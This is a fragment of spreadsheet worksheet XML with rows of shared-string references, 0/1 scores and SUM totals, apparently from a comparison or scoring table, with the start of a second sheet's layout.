    </row>
    <row r="28" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A28" s="3" t="s">
        <v>765</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>766</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>766</v>
      </c>
      <c r="D28">
        <v>1</v>
      </c>
      <c r="E28">
        <v>1</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>766</v>
      </c>
      <c r="G28">
        <v>1</v>
      </c>
      <c r="H28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A29" s="3" t="s">
        <v>767</v>
      </c>
      <c r="B29" s="3" t="s">
        <v>768</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>768</v>
      </c>
      <c r="D29">
        <v>1</v>
      </c>
      <c r="E29">
        <v>1</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>768</v>
      </c>
      <c r="G29">
        <v>1</v>
      </c>
      <c r="H29">
        <v>1</v>
      </c>
    </row>
    <row r="30" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A30" s="3" t="s">
        <v>769</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>198</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>198</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>198</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A31" s="3" t="s">
        <v>770</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>771</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>771</v>
      </c>
      <c r="D31">
        <v>1</v>
      </c>
      <c r="E31">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>771</v>
      </c>
      <c r="G31">
        <v>1</v>
      </c>
      <c r="H31">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A32" s="3" t="s">
        <v>772</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>773</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>773</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>773</v>
      </c>
      <c r="G32">
        <v>1</v>
      </c>
      <c r="H32">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A33" s="3" t="s">
        <v>774</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>775</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>775</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33">
        <v>1</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>775</v>
      </c>
      <c r="G33">
        <v>1</v>
      </c>
      <c r="H33">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>776</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>777</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>777</v>
      </c>
      <c r="D34">
        <v>1</v>
      </c>
      <c r="E34">
        <v>1</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>777</v>
      </c>
      <c r="G34">
        <v>1</v>
      </c>
      <c r="H34">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>778</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>779</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>779</v>
      </c>
      <c r="D35">
        <v>1</v>
      </c>
      <c r="E35">
        <v>1</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>798</v>
      </c>
      <c r="G35">
        <v>1</v>
      </c>
      <c r="H35">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A36" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>781</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>781</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>781</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A37" s="3" t="s">
        <v>782</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>783</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>1919</v>
      </c>
      <c r="D37">
        <v>0</v>
      </c>
      <c r="E37">
        <v>0</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>783</v>
      </c>
      <c r="G37">
        <v>1</v>
      </c>
      <c r="H37">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A38" s="3" t="s">
        <v>784</v>
      </c>
      <c r="B38" s="3" t="s">
        <v>219</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>1918</v>
      </c>
      <c r="D38">
        <v>0</v>
      </c>
      <c r="E38">
        <v>0</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>1921</v>
      </c>
      <c r="G38">
        <v>1</v>
      </c>
      <c r="H38">
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A39" s="3" t="s">
        <v>785</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>786</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>1920</v>
      </c>
      <c r="D39">
        <v>1</v>
      </c>
      <c r="E39">
        <v>0</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>1920</v>
      </c>
      <c r="G39">
        <v>1</v>
      </c>
      <c r="H39">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A40" s="3" t="s">
        <v>787</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>788</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>788</v>
      </c>
      <c r="D40">
        <v>1</v>
      </c>
      <c r="E40">
        <v>1</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>788</v>
      </c>
      <c r="G40">
        <v>1</v>
      </c>
      <c r="H40">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A41" s="3" t="s">
        <v>789</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>790</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>796</v>
      </c>
      <c r="D41">
        <v>1</v>
      </c>
      <c r="E41">
        <v>1</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>790</v>
      </c>
      <c r="G41">
        <v>1</v>
      </c>
      <c r="H41">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>791</v>
      </c>
      <c r="B42" s="3"/>
      <c r="C42" s="3"/>
      <c r="F42" s="3"/>
    </row>
    <row r="43" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A43" s="3" t="s">
        <v>792</v>
      </c>
      <c r="B43" s="3"/>
      <c r="C43" s="3"/>
      <c r="F43" s="3"/>
    </row>
    <row r="44" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A44" s="3" t="s">
        <v>793</v>
      </c>
      <c r="B44" s="3"/>
      <c r="C44" s="3"/>
      <c r="F44" s="3"/>
    </row>
    <row r="45" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A45" s="3" t="s">
        <v>794</v>
      </c>
      <c r="B45" s="3"/>
      <c r="C45" s="3"/>
      <c r="F45" s="3"/>
    </row>
    <row r="46" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A46" s="3" t="s">
        <v>795</v>
      </c>
      <c r="B46" s="3"/>
      <c r="C46" s="3"/>
      <c r="F46" s="3"/>
    </row>
    <row r="47" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A47" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D47" s="6">
        <f>SUM(D4:D41)</f>
        <v>36</v>
      </c>
      <c r="E47" s="6">
        <f t="shared" ref="E47:H47" si="0">SUM(E4:E41)</f>
        <v>35</v>
      </c>
      <c r="F47" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G47" s="6">
        <f t="shared" si="0"/>
        <v>38</v>
      </c>
      <c r="H47" s="6">
        <f t="shared" si="0"/>
        <v>36</v>
      </c>
    </row>
    <row r="50" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A50" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B50" s="25"/>
      <c r="C50" s="25"/>
      <c r="D50" s="25"/>
      <c r="E50" s="25"/>
      <c r="F50" s="25"/>
      <c r="G50" s="25"/>
      <c r="H50" s="25"/>
    </row>
    <row r="51" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A51" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B51" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C51" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D51" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E51" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F51" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G51" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H51" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="52" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A52" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B52" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C52" s="3" t="s">
        <v>56</v>
      </c>
      <c r="D52">
        <v>1</v>
      </c>
      <c r="E52" s="20">
        <v>1</v>
      </c>
      <c r="F52" s="3" t="s">
        <v>56</v>
      </c>
      <c r="G52" s="20">
        <v>1</v>
      </c>
      <c r="H52" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A53" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B53" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C53" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D53">
        <v>1</v>
      </c>
      <c r="E53" s="20">
        <v>1</v>
      </c>
      <c r="F53" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G53" s="20">
        <v>1</v>
      </c>
      <c r="H53" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A54" s="3" t="s">
        <v>1591</v>
      </c>
      <c r="B54" s="3" t="s">
        <v>1335</v>
      </c>
      <c r="C54" s="3" t="s">
        <v>1335</v>
      </c>
      <c r="D54">
        <v>1</v>
      </c>
      <c r="E54" s="20">
        <v>1</v>
      </c>
      <c r="F54" s="3" t="s">
        <v>1335</v>
      </c>
      <c r="G54" s="20">
        <v>1</v>
      </c>
      <c r="H54" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="55" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A55" s="3" t="s">
        <v>1689</v>
      </c>
      <c r="B55" s="3" t="s">
        <v>1373</v>
      </c>
      <c r="C55" s="3" t="s">
        <v>1373</v>
      </c>
      <c r="D55">
        <v>1</v>
      </c>
      <c r="E55" s="20">
        <v>1</v>
      </c>
      <c r="F55" s="3" t="s">
        <v>1373</v>
      </c>
      <c r="G55" s="20">
        <v>1</v>
      </c>
      <c r="H55" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="56" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A56" s="3" t="s">
        <v>1690</v>
      </c>
      <c r="B56" s="3" t="s">
        <v>1691</v>
      </c>
      <c r="C56" s="3" t="s">
        <v>1691</v>
      </c>
      <c r="D56">
        <v>1</v>
      </c>
      <c r="E56" s="20">
        <v>1</v>
      </c>
      <c r="F56" s="3" t="s">
        <v>1691</v>
      </c>
      <c r="G56" s="20">
        <v>1</v>
      </c>
      <c r="H56" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="57" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A57" s="3" t="s">
        <v>1596</v>
      </c>
      <c r="B57" s="3" t="s">
        <v>62</v>
      </c>
      <c r="C57" s="3" t="s">
        <v>62</v>
      </c>
      <c r="D57">
        <v>1</v>
      </c>
      <c r="E57" s="20">
        <v>1</v>
      </c>
      <c r="F57" s="3" t="s">
        <v>62</v>
      </c>
      <c r="G57" s="20">
        <v>1</v>
      </c>
      <c r="H57" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="58" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A58" s="3" t="s">
        <v>1146</v>
      </c>
      <c r="B58" s="3" t="s">
        <v>65</v>
      </c>
      <c r="C58" s="3" t="s">
        <v>65</v>
      </c>
      <c r="D58">
        <v>1</v>
      </c>
      <c r="E58" s="20">
        <v>1</v>
      </c>
      <c r="F58" s="3" t="s">
        <v>65</v>
      </c>
      <c r="G58" s="20">
        <v>1</v>
      </c>
      <c r="H58" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="59" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A59" s="3"/>
      <c r="B59" s="3" t="s">
        <v>1709</v>
      </c>
      <c r="C59" s="3" t="s">
        <v>1709</v>
      </c>
      <c r="D59" s="19">
        <v>1</v>
      </c>
      <c r="E59" s="20">
        <v>1</v>
      </c>
      <c r="F59" s="3" t="s">
        <v>1709</v>
      </c>
      <c r="G59" s="20">
        <v>1</v>
      </c>
      <c r="H59" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="60" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A60" s="3" t="s">
        <v>1692</v>
      </c>
      <c r="B60" s="3" t="s">
        <v>1064</v>
      </c>
      <c r="C60" s="3" t="s">
        <v>1064</v>
      </c>
      <c r="D60">
        <v>1</v>
      </c>
      <c r="E60" s="20">
        <v>1</v>
      </c>
      <c r="F60" s="3" t="s">
        <v>1064</v>
      </c>
      <c r="G60" s="20">
        <v>1</v>
      </c>
      <c r="H60" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="61" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A61" s="3" t="s">
        <v>1693</v>
      </c>
      <c r="B61" s="3" t="s">
        <v>1694</v>
      </c>
      <c r="C61" s="3" t="s">
        <v>1694</v>
      </c>
      <c r="D61">
        <v>1</v>
      </c>
      <c r="E61" s="20">
        <v>1</v>
      </c>
      <c r="F61" s="3" t="s">
        <v>1694</v>
      </c>
      <c r="G61" s="20">
        <v>1</v>
      </c>
      <c r="H61" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="62" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A62" s="3" t="s">
        <v>1695</v>
      </c>
      <c r="B62" s="3" t="s">
        <v>1696</v>
      </c>
      <c r="C62" s="3" t="s">
        <v>1696</v>
      </c>
      <c r="D62">
        <v>1</v>
      </c>
      <c r="E62" s="20">
        <v>1</v>
      </c>
      <c r="F62" s="3" t="s">
        <v>1696</v>
      </c>
      <c r="G62" s="20">
        <v>1</v>
      </c>
      <c r="H62" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="63" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A63" s="3" t="s">
        <v>1697</v>
      </c>
      <c r="B63" s="3" t="s">
        <v>1698</v>
      </c>
      <c r="C63" s="3" t="s">
        <v>1698</v>
      </c>
      <c r="D63">
        <v>1</v>
      </c>
      <c r="E63" s="20">
        <v>1</v>
      </c>
      <c r="F63" s="3" t="s">
        <v>1698</v>
      </c>
      <c r="G63" s="20">
        <v>1</v>
      </c>
      <c r="H63" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="64" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A64" s="3" t="s">
        <v>1699</v>
      </c>
      <c r="B64" s="3" t="s">
        <v>1700</v>
      </c>
      <c r="C64" s="3" t="s">
        <v>1700</v>
      </c>
      <c r="D64">
        <v>1</v>
      </c>
      <c r="E64" s="20">
        <v>1</v>
      </c>
      <c r="F64" s="3" t="s">
        <v>1700</v>
      </c>
      <c r="G64" s="20">
        <v>1</v>
      </c>
      <c r="H64" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A65" s="3" t="s">
        <v>1701</v>
      </c>
      <c r="B65" s="3" t="s">
        <v>1702</v>
      </c>
      <c r="C65" s="3" t="s">
        <v>1702</v>
      </c>
      <c r="D65">
        <v>1</v>
      </c>
      <c r="E65" s="20">
        <v>1</v>
      </c>
      <c r="F65" s="3" t="s">
        <v>1702</v>
      </c>
      <c r="G65" s="20">
        <v>1</v>
      </c>
      <c r="H65" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A66" s="3" t="s">
        <v>1703</v>
      </c>
      <c r="B66" s="3" t="s">
        <v>68</v>
      </c>
      <c r="C66" s="3" t="s">
        <v>68</v>
      </c>
      <c r="D66">
        <v>1</v>
      </c>
      <c r="E66" s="20">
        <v>1</v>
      </c>
      <c r="F66" s="3" t="s">
        <v>68</v>
      </c>
      <c r="G66" s="20">
        <v>1</v>
      </c>
      <c r="H66" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="67" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A67" s="3" t="s">
        <v>1704</v>
      </c>
      <c r="B67" s="3" t="s">
        <v>71</v>
      </c>
      <c r="C67" s="3" t="s">
        <v>71</v>
      </c>
      <c r="D67">
        <v>1</v>
      </c>
      <c r="E67" s="20">
        <v>1</v>
      </c>
      <c r="F67" s="3" t="s">
        <v>71</v>
      </c>
      <c r="G67" s="20">
        <v>1</v>
      </c>
      <c r="H67" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="68" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A68" s="3" t="s">
        <v>1705</v>
      </c>
      <c r="B68" s="3" t="s">
        <v>72</v>
      </c>
      <c r="C68" s="3" t="s">
        <v>72</v>
      </c>
      <c r="D68">
        <v>1</v>
      </c>
      <c r="E68" s="20">
        <v>1</v>
      </c>
      <c r="F68" s="3" t="s">
        <v>72</v>
      </c>
      <c r="G68" s="20">
        <v>1</v>
      </c>
      <c r="H68" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="69" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A69" s="3" t="s">
        <v>1706</v>
      </c>
      <c r="B69" s="3" t="s">
        <v>1706</v>
      </c>
      <c r="C69" s="3" t="s">
        <v>1706</v>
      </c>
      <c r="D69">
        <v>1</v>
      </c>
      <c r="E69" s="20">
        <v>1</v>
      </c>
      <c r="F69" s="3" t="s">
        <v>1706</v>
      </c>
      <c r="G69" s="20">
        <v>1</v>
      </c>
      <c r="H69" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="70" spans="1:8" ht="138.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A70" s="3" t="s">
        <v>1707</v>
      </c>
      <c r="B70" s="3" t="s">
        <v>1708</v>
      </c>
      <c r="C70" s="3" t="s">
        <v>1708</v>
      </c>
      <c r="D70">
        <v>1</v>
      </c>
      <c r="E70" s="20">
        <v>1</v>
      </c>
      <c r="F70" s="3" t="s">
        <v>1708</v>
      </c>
      <c r="G70" s="20">
        <v>1</v>
      </c>
      <c r="H70" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="71" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A71" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D71" s="6">
        <f>SUM(D52:D70)</f>
        <v>19</v>
      </c>
      <c r="E71" s="6">
        <f t="shared" ref="E71:H71" si="1">SUM(E52:E70)</f>
        <v>19</v>
      </c>
      <c r="F71" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G71" s="6">
        <f t="shared" si="1"/>
        <v>19</v>
      </c>
      <c r="H71" s="6">
        <f t="shared" si="1"/>
        <v>19</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A50:H50"/>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5727-3924-4D55-9EC2-3EAFFD72164F}">
  <dimension ref="A1:H75"/>
  <sheetViews>
    <sheetView topLeftCell="A67" workbookViewId="0">
      <selection activeCell="J75" sqref="J75"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="26.6640625" customWidth="1"/>
    <col min="2" max="2" width="26.5546875" customWidth="1"/>
    <col min="3" max="3" width="26.77734375" customWidth="1"/>
    <col min="4" max="5" width="10.33203125" customWidth="1"/>
    <col min="6" max="6" width="26.6640625" customWidth="1"/>
    <col min="7" max="7" width="10.33203125" customWidth="1"/>
    <col min="8" max="8" width="10.109375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="24" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>799</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ht="82.8" x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>800</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>24</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>827</v>
      </c>
      <c r="D4">
        <v>1</v>
      </c>
      <c r="E4">
        <v>0</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>24</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>801</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="D5">
        <v>1</v>
      </c>
      <c r="E5">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>802</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="D6">
        <v>1</v>
      </c>
      <c r="E6">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>803</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>804</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>804</v>
      </c>
      <c r="D7">
        <v>1</v>
      </c>
      <c r="E7">
        <v>1</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>829</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>805</v>
      </c>
      <c r="B8" s="3"/>
      <c r="C8" s="3"/>
      <c r="F8" s="3"/>
    </row>
    <row r="9" spans="1:8" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>806</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>807</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>828</v>
      </c>
      <c r="D9">
        <v>1</v>
      </c>
      <c r="E9">
        <v>0</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>830</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9">
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>808</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>36</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>37</v>
      </c>
      <c r="D10">
        <v>1</v>
      </c>
      <c r="E10">
        <v>0</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>36</v>
      </c>
      <c r="G10">
        <v>1</v>
      </c>
      <c r="H10">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>809</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>172</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>172</v>
      </c>
      <c r="D11">
        <v>1</v>
      </c>
      <c r="E11">
        <v>1</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>172</v>
      </c>
      <c r="G11">
        <v>1</v>
      </c>
      <c r="H11">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>810</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="D12">
        <v>1</v>
      </c>
      <c r="E12">
        <v>1</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="G12">
        <v>1</v>
      </c>
      <c r="H12">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>811</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>174</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>179</v>
      </c>
      <c r="D13">
        <v>1</v>
      </c>
      <c r="E13">
        <v>1</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>174</v>
      </c>
      <c r="G13">
        <v>1</v>
      </c>
      <c r="H13">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>812</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>813</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>813</v>
      </c>
      <c r="D14">
        <v>1</v>
      </c>
      <c r="E14">
        <v>1</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>831</v>
      </c>
      <c r="G14">
        <v>1</v>
      </c>
      <c r="H14">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>808</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>36</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>36</v>
      </c>
      <c r="D15">
        <v>1</v>
      </c>
      <c r="E15">
        <v>1</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>36</v>
      </c>
      <c r="G15">
        <v>1</v>
      </c>
      <c r="H15">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>809</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>172</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>172</v>
      </c>
      <c r="D16">
        <v>1</v>
      </c>
      <c r="E16">
        <v>1</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>172</v>
      </c>
      <c r="G16">
        <v>1</v>
      </c>
      <c r="H16">
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A17" s="3" t="s">
        <v>810</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>40</v>
      </c>
      <c r="D17">
        <v>1</v>
      </c>
      <c r="E17">
        <v>1</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>40</v>
      </c>
      <c r="G17">
        <v>1</v>
      </c>
      <c r="H17">
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>811</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>174</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>179</v>
      </c>
      <c r="D18">
        <v>1</v>
      </c>
      <c r="E18">
        <v>1</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>174</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>814</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>815</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>815</v>
      </c>
      <c r="D19">
        <v>1</v>
      </c>
      <c r="E19">
        <v>1</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>815</v>
      </c>
      <c r="G19">
        <v>1</v>
      </c>
      <c r="H19">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A20" s="3" t="s">
        <v>816</v>
      </c>
      <c r="B20" s="3" t="s">
        <v>817</v>
      </c>
